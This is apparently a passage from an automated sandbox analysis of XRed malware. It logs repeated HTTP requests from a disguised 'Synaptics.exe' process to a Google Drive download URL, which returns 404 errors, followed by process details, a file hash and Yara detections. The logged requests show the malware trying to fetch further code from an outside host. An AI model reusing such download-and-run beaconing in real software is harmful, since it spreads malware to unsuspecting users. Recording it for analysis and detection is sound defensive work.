                                                                                                                                                      Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      87 | 192.168.2.11 | 50066 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:55 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:55 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:55 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-fVb-tNPd7WhvVbR6wVxMpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      88 | 192.168.2.11 | 50067 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:55 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:56 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:55 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-eEltiTDPxdOjxibOC96ZSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      89 | 192.168.2.11 | 50073 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:56 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:56 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:56 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-4uE0aERkd6e_8LnUddv4bw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      90 | 192.168.2.11 | 50074 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:56 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:57 UTC  1250               IN         HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC75oPaWL1DdcjJ-ZT5dDt4k1bcot08ZfNFuevV8zXGWMkYXVyyiieBezUr5X-RgzccQbKiNVMM
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:56 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-YMWO-FU4SCPd4G8pJW0Z-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:57 UTC  140                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:57 UTC  1390               IN         Data Ascii: 404 (Not Found)!!1</title><style nonce="b7o6_gIk5gb6GruMuhMIpA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:57 UTC  122                IN         Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                      91          192.168.2.11  50075        172.217.18.110   443               7604  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                      2024-12-30 10:25:56 UTC  345                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:56 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:56 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-WyNW95cWqTUJicTpU1HHrQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                      92          192.168.2.11  50076        142.250.181.225  443               7604  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                      2024-12-30 10:25:56 UTC  388                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:57 UTC  1250               IN         HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC71c6y3GplwwShU1LhGdG_g7pm0GTJX7SBJwfDnQEz3EpUXoyGkdZx9Msf9FbTlOjszN0YR-SU
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:57 GMT
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-MpU-8d2JO0ezOY9_28hAfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:57 UTC  140                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:57 UTC  1390               IN         Data Ascii: 404 (Not Found)!!1</title><style nonce="aCGz7WkWsupiQs4wxBcB7Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:57 UTC  122                IN         Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                      93          192.168.2.11  50089        172.217.18.110   443               7604  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                      2024-12-30 10:26:09 UTC  345                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:26:10 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:26:09 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-S-iOgTqWb2ve1J_cYbGhMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                                                                                                                                      94          192.168.2.11  50090        142.250.181.225  443               7604  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp                Bytes transferred  Direction  Data
                                                                                                                                                      2024-12-30 10:26:09 UTC  388                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:26:10 UTC  1250               IN         HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6R_z-zuhsl83xTgJEgO4UYwnSo2R8SnM8paV4nd1Z8FMtD1St3KIeUwX9jApjU_89RD58HdTo
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:26:10 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-0Gtfe_Y9ZfC2kdQeCvooqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
2024-12-30 10:26:10 UTC    140    IN    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:26:10 UTC    1390    IN    Data Ascii: 404 (Not Found)!!1</title><style nonce="wkQhh6da9kwTlDoJGAOtGQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:26:10 UTC    122    IN    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
95    192.168.2.11    50091    142.250.181.225    443    7604    C:\ProgramData\Synaptics\Synaptics.exe
Timestamp    Bytes transferred    Direction    Data
2024-12-30 10:26:09 UTC    388    OUT    GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
2024-12-30 10:26:10 UTC    1250    IN    HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6zJLvFfmPw8MMxFtGiXpnJmlJ90Xc5gJBEOZ-KjeLqG9LdZPdwBbl2rJAQ_Egwlb04raVwmFQ
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:26:10 GMT
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-DFds0uMIRCKYInMkLif9tw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
2024-12-30 10:26:10 UTC    140    IN    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:26:10 UTC    1390    IN    Data Ascii: 404 (Not Found)!!1</title><style nonce="TMHSFfY_FXZyUZdxnJzszw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:26:10 UTC    122    IN    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>



                                                                                                                                                      Target ID:0
                                                                                                                                                      Start time:05:25:18
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Users\user\Desktop\JPS.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\Desktop\JPS.exe"
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:1'989'120 bytes
                                                                                                                                                      MD5 hash:290A46D2614F4CE4F7AD75D2CEA2CE23
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1298292720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1298292720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

